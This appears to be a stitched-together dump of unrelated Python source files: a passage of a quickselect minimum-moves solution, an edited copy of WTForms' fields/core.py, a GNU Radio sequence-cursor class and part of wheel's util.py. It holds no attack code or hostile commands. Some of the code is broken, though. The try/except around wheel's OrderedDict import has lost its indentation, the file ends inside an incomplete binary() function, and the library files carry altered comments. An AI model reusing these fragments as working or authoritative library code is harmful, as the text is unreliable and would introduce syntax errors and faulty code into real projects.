        numpy just for median() and returned a float for even-length input.
        """
        ordered = sorted(nums)
        median = ordered[len(ordered) // 2]
        return sum(abs(num - median) for num in ordered)
class Solution2(object):
    def minMoves2(self, nums):
        """
        :type nums: List[int]
        :rtype: int

        Quickselect variant (adapted from kamyu): find the median in O(n)
        average time, then sum distances to it.  Note: partitions in place,
        so ``nums`` order is not preserved.
        """
        # BUG FIX: randint was used below without ever being imported.
        from random import randint

        def kth_element(nums, k):
            """Return the k-th largest element (1-based) of nums."""
            def partition_around_pivot(left, right, pivot_idx, nums):
                pivot_value = nums[pivot_idx]
                new_pivot_idx = left
                nums[pivot_idx], nums[right] = nums[right], nums[pivot_idx]
                # Elements greater than the pivot go first (descending order).
                for i in range(left, right):  # FIX: xrange -> range (Py3)
                    if nums[i] > pivot_value:
                        nums[i], nums[new_pivot_idx] = \
                            nums[new_pivot_idx], nums[i]
                        new_pivot_idx += 1

                nums[right], nums[new_pivot_idx] = \
                    nums[new_pivot_idx], nums[right]
                return new_pivot_idx

            left, right = 0, len(nums) - 1
            while left <= right:
                pivot_idx = randint(left, right)
                new_pivot_idx = partition_around_pivot(
                    left, right, pivot_idx, nums)
                if new_pivot_idx == k - 1:
                    return nums[new_pivot_idx]
                elif new_pivot_idx > k - 1:
                    right = new_pivot_idx - 1
                else:  # new_pivot_idx < k - 1.
                    left = new_pivot_idx + 1

        median = kth_element(nums, len(nums) // 2 + 1)
        return sum(abs(num - median) for num in nums)
andrewmoses/ssquiz | flask/lib/python2.7/site-packages/wtforms/fields/core.py | 58 | 33124 | from __future__ import unicode_literals
import datetime
import decimal
import itertools
from wtforms import widgets
from wtforms.compat import text_type, izip
from wtforms.i18n import DummyTranslations
from wtforms.validators import StopValidation
from wtforms.utils import unset_value
__all__ = (
'BooleanField', 'DecimalField', 'DateField', 'DateTimeField', 'FieldList',
'FloatField', 'FormField', 'IntegerField', 'RadioField', 'SelectField',
'SelectMultipleField', 'StringField',
)
class Field(object):
    """
    Field base class
    """
    errors = tuple()
    process_errors = tuple()
    raw_data = None
    validators = tuple()
    widget = None
    _formfield = True
    _translations = DummyTranslations()
    do_not_call_in_templates = True  # Allow Django 1.4 traversal

    def __new__(cls, *args, **kwargs):
        # Outside of a form, constructing a Field yields an UnboundField
        # placeholder; the real field is built later by UnboundField.bind().
        if '_form' in kwargs and '_name' in kwargs:
            return super(Field, cls).__new__(cls)
        else:
            return UnboundField(cls, *args, **kwargs)

    def __init__(self, label=None, validators=None, filters=tuple(),
                 description='', id=None, default=None, widget=None,
                 _form=None, _name=None, _prefix='', _translations=None,
                 _meta=None):
        """
        Construct a new field.

        :param label:
            The label of the field.
        :param validators:
            A sequence of validators to call when `validate` is called.
        :param filters:
            A sequence of filters which are run on input data by `process`.
        :param description:
            A description for the field, typically used for help text.
        :param id:
            An id to use for the field. A reasonable default is set by the form,
            and you shouldn't need to set this manually.
        :param default:
            The default value to assign to the field, if no form or object
            input is provided. May be a callable.
        :param widget:
            If provided, overrides the widget used to render the field.
        :param _form:
            The form holding this field. It is passed by the form itself during
            construction. You should never pass this value yourself.
        :param _name:
            The name of this field, passed by the enclosing form during its
            construction. You should never pass this value yourself.
        :param _prefix:
            The prefix to prepend to the form name of this field, passed by
            the enclosing form during construction.
        :param _translations:
            A translations object providing message translations. Usually
            passed by the enclosing form during construction. See
            :doc:`I18n docs <i18n>` for information on message translations.
        :param _meta:
            If provided, this is the 'meta' instance from the form. You usually
            don't pass this yourself.

        If `_form` and `_name` isn't provided, an :class:`UnboundField` will be
        returned instead. Call its :func:`bind` method with a form instance and
        a name to construct the field.
        """
        if _translations is not None:
            self._translations = _translations

        if _meta is not None:
            self.meta = _meta
        elif _form is not None:
            self.meta = _form.meta
        else:
            raise TypeError("Must provide one of _form or _meta")

        self.default = default
        self.description = description
        self.filters = filters
        self.flags = Flags()
        self.name = _prefix + _name
        self.short_name = _name
        self.type = type(self).__name__
        self.validators = validators or list(self.validators)

        self.id = id or self.name
        # Default label: the field name, title-cased and translated.
        self.label = Label(self.id, label if label is not None else self.gettext(_name.replace('_', ' ').title()))

        if widget is not None:
            self.widget = widget

        # Validators may advertise flags (e.g. 'required') that are copied
        # onto the field for use by renderers.
        for v in self.validators:
            flags = getattr(v, 'field_flags', ())
            for f in flags:
                setattr(self.flags, f, True)

    def __unicode__(self):
        """
        Returns a HTML representation of the field. For more powerful rendering,
        see the `__call__` method.
        """
        return self()

    def __str__(self):
        """
        Returns a HTML representation of the field. For more powerful rendering,
        see the `__call__` method.
        """
        return self()

    def __html__(self):
        """
        Returns a HTML representation of the field. For more powerful rendering,
        see the :meth:`__call__` method.
        """
        return self()

    def __call__(self, **kwargs):
        """
        Render this field as HTML, using keyword args as additional attributes.

        This delegates rendering to
        :meth:`meta.render_field <wtforms.meta.DefaultMeta.render_field>`
        whose default behavior is to call the field's widget, passing any
        keyword arguments from this call along to the widget.

        In all of the WTForms HTML widgets, keyword arguments are turned to
        HTML attributes, though in theory a widget is free to do anything it
        wants with the supplied keyword arguments, and widgets don't have to
        even do anything related to HTML.
        """
        return self.meta.render_field(self, kwargs)

    def gettext(self, string):
        """
        Get a translation for the given message.

        This proxies for the internal translations object.

        :param string: A unicode string to be translated.
        :return: A unicode string which is the translated output.
        """
        return self._translations.gettext(string)

    def ngettext(self, singular, plural, n):
        """
        Get a translation for a message which can be pluralized.

        :param str singular: The singular form of the message.
        :param str plural: The plural form of the message.
        :param int n: The number of elements this message is referring to
        """
        return self._translations.ngettext(singular, plural, n)

    def validate(self, form, extra_validators=tuple()):
        """
        Validates the field and returns True or False. `self.errors` will
        contain any errors raised during validation. This is usually only
        called by `Form.validate`.

        Subfields shouldn't override this, but rather override either
        `pre_validate`, `post_validate` or both, depending on needs.

        :param form: The form the field belongs to.
        :param extra_validators: A sequence of extra validators to run.
        """
        self.errors = list(self.process_errors)
        stop_validation = False

        # Call pre_validate
        try:
            self.pre_validate(form)
        except StopValidation as e:
            if e.args and e.args[0]:
                self.errors.append(e.args[0])
            stop_validation = True
        except ValueError as e:
            self.errors.append(e.args[0])

        # Run validators
        if not stop_validation:
            chain = itertools.chain(self.validators, extra_validators)
            stop_validation = self._run_validation_chain(form, chain)

        # Call post_validate
        try:
            self.post_validate(form, stop_validation)
        except ValueError as e:
            self.errors.append(e.args[0])

        return len(self.errors) == 0

    def _run_validation_chain(self, form, validators):
        """
        Run a validation chain, stopping if any validator raises StopValidation.

        :param form: The Form instance this field belongs to.
        :param validators: a sequence or iterable of validator callables.
        :return: True if validation was stopped, False otherwise.
        """
        for validator in validators:
            try:
                validator(form, self)
            except StopValidation as e:
                if e.args and e.args[0]:
                    self.errors.append(e.args[0])
                return True
            except ValueError as e:
                self.errors.append(e.args[0])

        return False

    def pre_validate(self, form):
        """
        Override if you need field-level validation. Runs before any other
        validators.

        :param form: The form the field belongs to.
        """
        pass

    def post_validate(self, form, validation_stopped):
        """
        Override if you need to run any field-level validation tasks after
        normal validation. This shouldn't be needed in most cases.

        :param form: The form the field belongs to.
        :param validation_stopped:
            `True` if any validator raised StopValidation.
        """
        pass

    def process(self, formdata, data=unset_value):
        """
        Process incoming data, calling process_data, process_formdata as needed,
        and run filters.

        If `data` is not provided, process_data will be called on the field's
        default.

        Field subclasses usually won't override this, instead overriding the
        process_formdata and process_data methods. Only override this for
        special advanced processing, such as when a field encapsulates many
        inputs.
        """
        self.process_errors = []
        if data is unset_value:
            try:
                data = self.default()
            except TypeError:
                # default is a plain value, not a callable
                data = self.default

        self.object_data = data

        try:
            self.process_data(data)
        except ValueError as e:
            self.process_errors.append(e.args[0])

        if formdata:
            try:
                if self.name in formdata:
                    self.raw_data = formdata.getlist(self.name)
                else:
                    self.raw_data = []
                self.process_formdata(self.raw_data)
            except ValueError as e:
                self.process_errors.append(e.args[0])

        try:
            for filter in self.filters:
                self.data = filter(self.data)
        except ValueError as e:
            self.process_errors.append(e.args[0])

    def process_data(self, value):
        """
        Process the Python data applied to this field and store the result.

        This will be called during form construction by the form's `kwargs` or
        `obj` argument.

        :param value: The python object containing the value to process.
        """
        self.data = value

    def process_formdata(self, valuelist):
        """
        Process data received over the wire from a form.

        This will be called during form construction with data supplied
        through the `formdata` argument.

        :param valuelist: A list of strings to process.
        """
        if valuelist:
            self.data = valuelist[0]

    def populate_obj(self, obj, name):
        """
        Populates `obj.<name>` with the field's data.

        :note: This is a destructive operation. If `obj.<name>` already exists,
        it will be overridden. Use with caution.
        """
        setattr(obj, name, self.data)
class UnboundField(object):
    """Placeholder returned when a Field is constructed outside a form.

    Remembers the field class and constructor arguments so the real field
    can be built later via :meth:`bind`.  ``creation_counter`` preserves
    field declaration order.
    """
    _formfield = True
    creation_counter = 0

    def __init__(self, field_class, *args, **kwargs):
        UnboundField.creation_counter += 1
        self.field_class = field_class
        self.args = args
        self.kwargs = kwargs
        self.creation_counter = UnboundField.creation_counter

    def bind(self, form, name, prefix='', translations=None, **kwargs):
        """Construct the actual field instance, bound to *form* as *name*."""
        kw = dict(
            self.kwargs,
            _form=form,
            _prefix=prefix,
            _name=name,
            _translations=translations,
            **kwargs
        )
        return self.field_class(*self.args, **kw)

    def __repr__(self):
        return '<UnboundField(%s, %r, %r)>' % (self.field_class.__name__, self.args, self.kwargs)
class Flags(object):
    """
    Holds a set of boolean flags as attributes.

    Accessing a non-existing attribute returns False for its value.
    """

    def __getattr__(self, name):
        # Underscore-prefixed lookups are delegated rather than defaulting
        # to False, so special/dunder protocol probes behave normally.
        if name.startswith('_'):
            return super(Flags, self).__getattr__(name)
        return False

    def __contains__(self, name):
        return getattr(self, name)

    def __repr__(self):
        flags = (name for name in dir(self) if not name.startswith('_'))
        return '<wtforms.fields.Flags: {%s}>' % ', '.join(flags)
class Label(object):
    """
    An HTML form label.
    """

    def __init__(self, field_id, text):
        self.field_id = field_id
        self.text = text

    def __str__(self):
        return self()

    def __unicode__(self):
        return self()

    def __html__(self):
        return self()

    def __call__(self, text=None, **kwargs):
        # 'for_' is accepted as a keyword alias because 'for' is reserved.
        if 'for_' in kwargs:
            kwargs['for'] = kwargs.pop('for_')
        else:
            kwargs.setdefault('for', self.field_id)

        attributes = widgets.html_params(**kwargs)
        return widgets.HTMLString('<label %s>%s</label>' % (attributes, text or self.text))

    def __repr__(self):
        return 'Label(%r, %r)' % (self.field_id, self.text)
class SelectFieldBase(Field):
    option_widget = widgets.Option()

    """
    Base class for fields which can be iterated to produce options.

    This isn't a field, but an abstract base class for fields which want to
    provide this functionality.
    """

    def __init__(self, label=None, validators=None, option_widget=None, **kwargs):
        super(SelectFieldBase, self).__init__(label, validators, **kwargs)

        if option_widget is not None:
            self.option_widget = option_widget

    def iter_choices(self):
        """
        Provides data for choice widget rendering. Must return a sequence or
        iterable of (value, label, selected) tuples.
        """
        raise NotImplementedError()

    def __iter__(self):
        # Yield one _Option sub-field per choice so templates can render
        # each option (with its label) individually.
        opts = dict(widget=self.option_widget, _name=self.name, _form=None, _meta=self.meta)
        for i, (value, label, checked) in enumerate(self.iter_choices()):
            opt = self._Option(label=label, id='%s-%d' % (self.id, i), **opts)
            opt.process(None, value)
            opt.checked = checked
            yield opt

    class _Option(Field):
        checked = False

        def _value(self):
            return text_type(self.data)
class SelectField(SelectFieldBase):
    widget = widgets.Select()

    def __init__(self, label=None, validators=None, coerce=text_type, choices=None, **kwargs):
        super(SelectField, self).__init__(label, validators, **kwargs)
        self.coerce = coerce
        self.choices = choices

    def iter_choices(self):
        for value, label in self.choices:
            yield (value, label, self.coerce(value) == self.data)

    def process_data(self, value):
        try:
            self.data = self.coerce(value)
        except (ValueError, TypeError):
            # Uncoercible object data leaves the field without a selection.
            self.data = None

    def process_formdata(self, valuelist):
        if valuelist:
            try:
                self.data = self.coerce(valuelist[0])
            except ValueError:
                raise ValueError(self.gettext('Invalid Choice: could not coerce'))

    def pre_validate(self, form):
        # The submitted value must match one of the declared choices.
        for v, _ in self.choices:
            if self.data == v:
                break
        else:
            raise ValueError(self.gettext('Not a valid choice'))
class SelectMultipleField(SelectField):
    """
    No different from a normal select field, except this one can take (and
    validate) multiple choices. You'll need to specify the HTML `size`
    attribute to the select field when rendering.
    """
    widget = widgets.Select(multiple=True)

    def iter_choices(self):
        for choice_value, choice_label in self.choices:
            is_selected = self.data is not None and self.coerce(choice_value) in self.data
            yield (choice_value, choice_label, is_selected)

    def process_data(self, value):
        try:
            self.data = [self.coerce(v) for v in value]
        except (ValueError, TypeError):
            # Non-iterable or uncoercible object data leaves the field empty.
            self.data = None

    def process_formdata(self, valuelist):
        try:
            self.data = [self.coerce(x) for x in valuelist]
        except ValueError:
            raise ValueError(self.gettext('Invalid choice(s): one or more data inputs could not be coerced'))

    def pre_validate(self, form):
        if not self.data:
            return
        # Keep the membership container a list: choice values are not
        # guaranteed hashable, so a set could change behavior.
        valid_values = [choice[0] for choice in self.choices]
        for item in self.data:
            if item not in valid_values:
                raise ValueError(self.gettext("'%(value)s' is not a valid choice for this field") % dict(value=item))
class RadioField(SelectField):
    """
    Like a SelectField, except displays a list of radio buttons.
    Iterating the field will produce subfields (each containing a label as
    well) in order to allow custom rendering of the individual radio fields.
    """
    # One radio input per choice, wrapped in a list widget.
    # prefix_label=False — presumably renders each label after its input;
    # confirm against widgets.ListWidget.
    widget = widgets.ListWidget(prefix_label=False)
    option_widget = widgets.RadioInput()
class StringField(Field):
    """
    This field is the base for most of the more complicated fields, and
    represents an ``<input type="text">``.
    """
    widget = widgets.TextInput()

    def process_formdata(self, valuelist):
        # Take the first submitted value; fall back to the empty string.
        self.data = valuelist[0] if valuelist else ''

    def _value(self):
        if self.data is None:
            return ''
        return text_type(self.data)
class LocaleAwareNumberField(Field):
    """
    Base class for implementing locale-aware number parsing.
    Locale-aware numbers require the 'babel' package to be present.
    """
    def __init__(self, label=None, validators=None, use_locale=False, number_format=None, **kwargs):
        super(LocaleAwareNumberField, self).__init__(label, validators, **kwargs)
        self.use_locale = use_locale
        if use_locale:
            self.number_format = number_format
            # NOTE(review): assumes '_form' is always present in kwargs when
            # use_locale is set; direct construction without a form would raise
            # KeyError here — confirm intended.
            self.locale = kwargs['_form'].meta.locales[0]
            self._init_babel()
    def _init_babel(self):
        # Imported lazily so babel is only required when locale parsing is used.
        try:
            from babel import numbers
            self.babel_numbers = numbers
        except ImportError:
            raise ImportError('Using locale-aware decimals requires the babel library.')
    def _parse_decimal(self, value):
        # Parse a locale-formatted string into a Decimal.
        return self.babel_numbers.parse_decimal(value, self.locale)
    def _format_decimal(self, value):
        # Format a Decimal using the configured locale/number format.
        return self.babel_numbers.format_decimal(value, self.number_format, self.locale)
class IntegerField(Field):
    """
    A text field, except all input is coerced to an integer. Erroneous input
    is ignored and will not be accepted as a value.
    """
    # NOTE: the previous pass-through ``__init__`` (which only forwarded
    # label/validators/**kwargs to super unchanged) was dead code and has been
    # removed; construction behavior is identical via Field.__init__.
    widget = widgets.TextInput()

    def _value(self):
        """Render the raw submitted text if present, else the stored data."""
        if self.raw_data:
            return self.raw_data[0]
        elif self.data is not None:
            return text_type(self.data)
        else:
            return ''

    def process_formdata(self, valuelist):
        """Coerce the submitted value to ``int``; invalid input clears data and raises."""
        if valuelist:
            try:
                self.data = int(valuelist[0])
            except ValueError:
                self.data = None
                raise ValueError(self.gettext('Not a valid integer value'))
class DecimalField(LocaleAwareNumberField):
    """
    A text field which displays and coerces data of the `decimal.Decimal` type.
    :param places:
        How many decimal places to quantize the value to for display on form.
        If None, does not quantize value.
    :param rounding:
        How to round the value during quantize, for example
        `decimal.ROUND_UP`. If unset, uses the rounding value from the
        current thread's context.
    :param use_locale:
        If True, use locale-based number formatting. Locale-based number
        formatting requires the 'babel' package.
    :param number_format:
        Optional number format for locale. If omitted, use the default decimal
        format for the locale.
    """
    widget = widgets.TextInput()
    def __init__(self, label=None, validators=None, places=unset_value, rounding=None, **kwargs):
        super(DecimalField, self).__init__(label, validators, **kwargs)
        # NOTE(review): the message says the options "are ignored" but the
        # code actually raises — wording and behavior disagree.
        if self.use_locale and (places is not unset_value or rounding is not None):
            raise TypeError("When using locale-aware numbers, 'places' and 'rounding' are ignored.")
        if places is unset_value:
            places = 2
        self.places = places
        self.rounding = rounding
    def _value(self):
        # Prefer echoing back exactly what the user typed.
        if self.raw_data:
            return self.raw_data[0]
        elif self.data is not None:
            if self.use_locale:
                return text_type(self._format_decimal(self.data))
            elif self.places is not None:
                if hasattr(self.data, 'quantize'):
                    # Quantize to the configured number of decimal places.
                    exp = decimal.Decimal('.1') ** self.places
                    if self.rounding is None:
                        quantized = self.data.quantize(exp)
                    else:
                        quantized = self.data.quantize(exp, rounding=self.rounding)
                    return text_type(quantized)
                else:
                    # If for some reason, data is a float or int, then format
                    # as we would for floats using string formatting.
                    format = '%%0.%df' % self.places
                    return format % self.data
            else:
                return text_type(self.data)
        else:
            return ''
    def process_formdata(self, valuelist):
        if valuelist:
            try:
                if self.use_locale:
                    self.data = self._parse_decimal(valuelist[0])
                else:
                    self.data = decimal.Decimal(valuelist[0])
            except (decimal.InvalidOperation, ValueError):
                self.data = None
                raise ValueError(self.gettext('Not a valid decimal value'))
class FloatField(Field):
    """
    A text field, except all input is coerced to an float. Erroneous input
    is ignored and will not be accepted as a value.
    """
    widget = widgets.TextInput()

    def __init__(self, label=None, validators=None, **kwargs):
        super(FloatField, self).__init__(label, validators, **kwargs)

    def _value(self):
        # Echo back the raw submission if present, else the stored data.
        if self.raw_data:
            return self.raw_data[0]
        if self.data is None:
            return ''
        return text_type(self.data)

    def process_formdata(self, valuelist):
        if not valuelist:
            return
        try:
            self.data = float(valuelist[0])
        except ValueError:
            self.data = None
            raise ValueError(self.gettext('Not a valid float value'))
class BooleanField(Field):
    """
    Represents an ``<input type="checkbox">``.
    :param false_values:
        If provided, a sequence of strings each of which is an exact match
        string of what is considered a "false" value. Defaults to the tuple
        ``('false', '')``
    """
    widget = widgets.CheckboxInput()
    false_values = ('false', '')

    def __init__(self, label=None, validators=None, false_values=None, **kwargs):
        super(BooleanField, self).__init__(label, validators, **kwargs)
        if false_values is not None:
            self.false_values = false_values

    def process_data(self, value):
        self.data = bool(value)

    def process_formdata(self, valuelist):
        # Checked unless nothing was submitted or the value is a known "false".
        self.data = bool(valuelist) and valuelist[0] not in self.false_values

    def _value(self):
        return text_type(self.raw_data[0]) if self.raw_data else 'y'
class DateTimeField(Field):
    """
    A text field which stores a `datetime.datetime` matching a format.
    """
    widget = widgets.TextInput()

    def __init__(self, label=None, validators=None, format='%Y-%m-%d %H:%M:%S', **kwargs):
        super(DateTimeField, self).__init__(label, validators, **kwargs)
        self.format = format

    def _value(self):
        if self.raw_data:
            return ' '.join(self.raw_data)
        return self.data and self.data.strftime(self.format) or ''

    def process_formdata(self, valuelist):
        if not valuelist:
            return
        # Multi-part submissions (e.g. separate date and time inputs) are
        # joined with spaces before parsing.
        date_str = ' '.join(valuelist)
        try:
            self.data = datetime.datetime.strptime(date_str, self.format)
        except ValueError:
            self.data = None
            raise ValueError(self.gettext('Not a valid datetime value'))
class DateField(DateTimeField):
    """
    Same as DateTimeField, except stores a `datetime.date`.
    """
    def __init__(self, label=None, validators=None, format='%Y-%m-%d', **kwargs):
        super(DateField, self).__init__(label, validators, format, **kwargs)
    def process_formdata(self, valuelist):
        # Mirrors DateTimeField.process_formdata but keeps only the date part.
        if valuelist:
            date_str = ' '.join(valuelist)
            try:
                self.data = datetime.datetime.strptime(date_str, self.format).date()
            except ValueError:
                self.data = None
                raise ValueError(self.gettext('Not a valid date value'))
class FormField(Field):
    """
    Encapsulate a form as a field in another form.
    :param form_class:
        A subclass of Form that will be encapsulated.
    :param separator:
        A string which will be suffixed to this field's name to create the
        prefix to enclosed fields. The default is fine for most uses.
    """
    widget = widgets.TableWidget()
    def __init__(self, form_class, label=None, validators=None, separator='-', **kwargs):
        super(FormField, self).__init__(label, validators, **kwargs)
        self.form_class = form_class
        self.separator = separator
        self._obj = None
        # Filters and validators belong on the enclosed form's fields, not here.
        if self.filters:
            raise TypeError('FormField cannot take filters, as the encapsulated data is not mutable.')
        if validators:
            raise TypeError('FormField does not accept any validators. Instead, define them on the enclosed form.')
    def process(self, formdata, data=unset_value):
        # Fall back to the field default, which may be a callable factory.
        if data is unset_value:
            try:
                data = self.default()
            except TypeError:
                data = self.default
            self._obj = data
        self.object_data = data
        prefix = self.name + self.separator
        # Dicts become keyword arguments; anything else is passed as obj.
        if isinstance(data, dict):
            self.form = self.form_class(formdata=formdata, prefix=prefix, **data)
        else:
            self.form = self.form_class(formdata=formdata, obj=data, prefix=prefix)
    def validate(self, form, extra_validators=tuple()):
        if extra_validators:
            raise TypeError('FormField does not accept in-line validators, as it gets errors from the enclosed form.')
        # Validation is delegated entirely to the enclosed form.
        return self.form.validate()
    def populate_obj(self, obj, name):
        candidate = getattr(obj, name, None)
        if candidate is None:
            if self._obj is None:
                raise TypeError('populate_obj: cannot find a value to populate from the provided obj or input data/defaults')
            candidate = self._obj
        setattr(obj, name, candidate)
        self.form.populate_obj(candidate)
    def __iter__(self):
        return iter(self.form)
    def __getitem__(self, name):
        return self.form[name]
    def __getattr__(self, name):
        # Unknown attributes are proxied to the enclosed form.
        return getattr(self.form, name)
    @property
    def data(self):
        return self.form.data
    @property
    def errors(self):
        return self.form.errors
class FieldList(Field):
    """
    Encapsulate an ordered list of multiple instances of the same field type,
    keeping data as a list.
    >>> authors = FieldList(StringField('Name', [validators.required()]))
    :param unbound_field:
        A partially-instantiated field definition, just like that would be
        defined on a form directly.
    :param min_entries:
        if provided, always have at least this many entries on the field,
        creating blank ones if the provided input does not specify a sufficient
        amount.
    :param max_entries:
        accept no more than this many entries as input, even if more exist in
        formdata.
    """
    widget = widgets.ListWidget()
    def __init__(self, unbound_field, label=None, validators=None, min_entries=0,
                 max_entries=None, default=tuple(), **kwargs):
        super(FieldList, self).__init__(label, validators, default=default, **kwargs)
        if self.filters:
            raise TypeError('FieldList does not accept any filters. Instead, define them on the enclosed field.')
        assert isinstance(unbound_field, UnboundField), 'Field must be unbound, not a field class'
        self.unbound_field = unbound_field
        self.min_entries = min_entries
        self.max_entries = max_entries
        # Index of the most recently added entry; -1 means "no entries yet".
        self.last_index = -1
        self._prefix = kwargs.get('_prefix', '')
    def process(self, formdata, data=unset_value):
        """Rebuild self.entries from formdata and/or object data."""
        self.entries = []
        if data is unset_value or not data:
            try:
                data = self.default()
            except TypeError:
                data = self.default
        self.object_data = data
        if formdata:
            # Entry indices come from the submitted field names, capped at
            # max_entries; object data is zipped in positionally.
            indices = sorted(set(self._extract_indices(self.name, formdata)))
            if self.max_entries:
                indices = indices[:self.max_entries]
            idata = iter(data)
            for index in indices:
                try:
                    obj_data = next(idata)
                except StopIteration:
                    obj_data = unset_value
                self._add_entry(formdata, obj_data, index=index)
        else:
            for obj_data in data:
                self._add_entry(formdata, obj_data)
        # Pad with blank entries up to the configured minimum.
        while len(self.entries) < self.min_entries:
            self._add_entry(formdata)
    def _extract_indices(self, prefix, formdata):
        """
        Yield indices of any keys with given prefix.
        formdata must be an object which will produce keys when iterated. For
        example, if field 'foo' contains keys 'foo-0-bar', 'foo-1-baz', then
        the numbers 0 and 1 will be yielded, but not neccesarily in order.
        """
        # +1 skips the separator character after the prefix.
        offset = len(prefix) + 1
        for k in formdata:
            if k.startswith(prefix):
                k = k[offset:].split('-', 1)[0]
                if k.isdigit():
                    yield int(k)
    def validate(self, form, extra_validators=tuple()):
        """
        Validate this FieldList.
        Note that FieldList validation differs from normal field validation in
        that FieldList validates all its enclosed fields first before running any
        of its own validators.
        """
        self.errors = []
        # Run validators on all entries within
        for subfield in self.entries:
            if not subfield.validate(form):
                self.errors.append(subfield.errors)
        chain = itertools.chain(self.validators, extra_validators)
        self._run_validation_chain(form, chain)
        return len(self.errors) == 0
    def populate_obj(self, obj, name):
        """Write entry data back onto obj.name as a plain list."""
        values = getattr(obj, name, None)
        try:
            ivalues = iter(values)
        except TypeError:
            ivalues = iter([])
        # Pad existing values with Nones so every entry has a candidate.
        candidates = itertools.chain(ivalues, itertools.repeat(None))
        # Throwaway holder object so each entry can populate a 'data' attr.
        _fake = type(str('_fake'), (object, ), {})
        output = []
        for field, data in izip(self.entries, candidates):
            fake_obj = _fake()
            fake_obj.data = data
            field.populate_obj(fake_obj, 'data')
            output.append(fake_obj.data)
        setattr(obj, name, output)
    def _add_entry(self, formdata=None, data=unset_value, index=None):
        """Bind and process one enclosed field, appending it to entries."""
        assert not self.max_entries or len(self.entries) < self.max_entries, \
            'You cannot have more than max_entries entries in this FieldList'
        if index is None:
            index = self.last_index + 1
        self.last_index = index
        name = '%s-%d' % (self.short_name, index)
        id = '%s-%d' % (self.id, index)
        field = self.unbound_field.bind(form=None, name=name, prefix=self._prefix, id=id, _meta=self.meta)
        field.process(formdata, data)
        self.entries.append(field)
        return field
    def append_entry(self, data=unset_value):
        """
        Create a new entry with optional default data.
        Entries added in this way will *not* receive formdata however, and can
        only receive object data.
        """
        return self._add_entry(data=data)
    def pop_entry(self):
        """ Removes the last entry from the list and returns it. """
        entry = self.entries.pop()
        self.last_index -= 1
        return entry
    def __iter__(self):
        return iter(self.entries)
    def __len__(self):
        return len(self.entries)
    def __getitem__(self, index):
        return self.entries[index]
    @property
    def data(self):
        return [f.data for f in self.entries]
| bsd-3-clause |
SpectreJan/gnuradio | gnuradio-runtime/python/gnuradio/gru/seq_with_cursor.py | 78 | 2494 | #
# Copyright 2003,2004 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# misc utilities
import types
import exceptions
class seq_with_cursor (object):
    # A non-empty sequence paired with a movable cursor. Python 2 code: the
    # module imports the py2-only ``exceptions`` module, and set_index relies
    # on classic integer division.
    __slots__ = [ 'items', 'index' ]
    def __init__ (self, items, initial_index = None, initial_value = None):
        # items must be non-empty; initial_value (if given) overrides
        # initial_index by searching for the first item >= initial_value.
        assert len (items) > 0, "seq_with_cursor: len (items) == 0"
        self.items = items
        self.set_index (initial_index)
        if initial_value is not None:
            self.set_index_by_value(initial_value)
    def set_index (self, initial_index):
        if initial_index is None:
            # Default to the middle of the sequence. NOTE(review): '/' is
            # integer division only under Python 2; under Python 3 this would
            # produce a float index and fail on indexing.
            self.index = len (self.items) / 2
        elif initial_index >= 0 and initial_index < len (self.items):
            self.index = initial_index
        else:
            raise exceptions.ValueError
    def set_index_by_value(self, v):
        """
        Set index to the smallest value such that items[index] >= v.
        If there is no such item, set index to the maximum value.
        """
        # Assumes items are sorted ascending — TODO confirm with callers.
        self.set_index(0)                       # side effect!
        cv = self.current()
        more = True
        while cv < v and more:
            cv, more = self.next()              # side effect!
    def next (self):
        # Advance if possible; returns (item, moved) where moved is False at
        # the right boundary.
        new_index = self.index + 1
        if new_index < len (self.items):
            self.index = new_index
            return self.items[new_index], True
        else:
            return self.items[self.index], False
    def prev (self):
        # Step back if possible; returns (item, moved).
        new_index = self.index - 1
        if new_index >= 0:
            self.index = new_index
            return self.items[new_index], True
        else:
            return self.items[self.index], False
    def current (self):
        return self.items[self.index]
    def get_seq (self):
        return self.items[:]                    # copy of items
| gpl-3.0 |
z1gm4/desarrollo_web_udp | env/lib/python2.7/site-packages/wheel/util.py | 345 | 4890 | """Utility functions."""
import sys
import os
import base64
import json
import hashlib
try:
from collections import OrderedDict
except ImportError:
OrderedDict = dict
__all__ = ['urlsafe_b64encode', 'urlsafe_b64decode', 'utf8',
'to_json', 'from_json', 'matches_requirement']
def urlsafe_b64encode(data):
    """URL-safe base64 encode *data*, dropping the trailing ``=`` padding."""
    # b'=' is exactly what the binary('=') helper produces on both py2/py3.
    return base64.urlsafe_b64encode(data).rstrip(b'=')
def urlsafe_b64decode(data):
    """URL-safe base64 decode *data*, tolerating stripped ``=`` padding."""
    padding = b'=' * (4 - (len(data) & 3))
    return base64.urlsafe_b64decode(data + padding)
def to_json(o):
    '''Convert given data to JSON.'''
    # sort_keys makes the output deterministic, keeping generated metadata
    # files reproducible.
    return json.dumps(o, sort_keys=True)
def from_json(j):
    '''Decode a JSON payload.'''
    # Inverse of to_json().
    return json.loads(j)
def open_for_csv(name, mode):
    """Open *name* suitably for the csv module: binary mode on Python 2,
    ``newline=''`` on Python 3."""
    if sys.version_info[0] < 3:
        extra_kwargs = {}
        mode_suffix = 'b'
    else:
        extra_kwargs = {'newline': ''}
        mode_suffix = ''
    return open(name, mode + mode_suffix, **extra_kwargs)
try:
    # Python 2: ``unicode`` exists, so text must be encoded down to utf-8.
    unicode
    def utf8(data):
        '''Utf-8 encode data.'''
        if isinstance(data, unicode):
            return data.encode('utf-8')
        return data
except NameError:
    # Python 3: the native text type is ``str``.
    def utf8(data):
        '''Utf-8 encode data.'''
        if isinstance(data, str):
            return data.encode('utf-8')
        return data
try:
    # For encoding ascii back and forth between bytestrings, as is repeatedly
    # necessary in JSON-based crypto under Python 3
    unicode
    def native(s):
        return s
    def binary(s):
        if isinstance(s, unicode):
            return s.encode('ascii')
        return s
except NameError:
    def native(s):
        """Decode ascii bytes to the native ``str``; pass str through."""
        if isinstance(s, bytes):
            return s.decode('ascii')
        return s
    def binary(s):
        """Encode native ``str`` to ascii bytes; pass bytes through."""
        if isinstance(s, str):
            return s.encode('ascii')
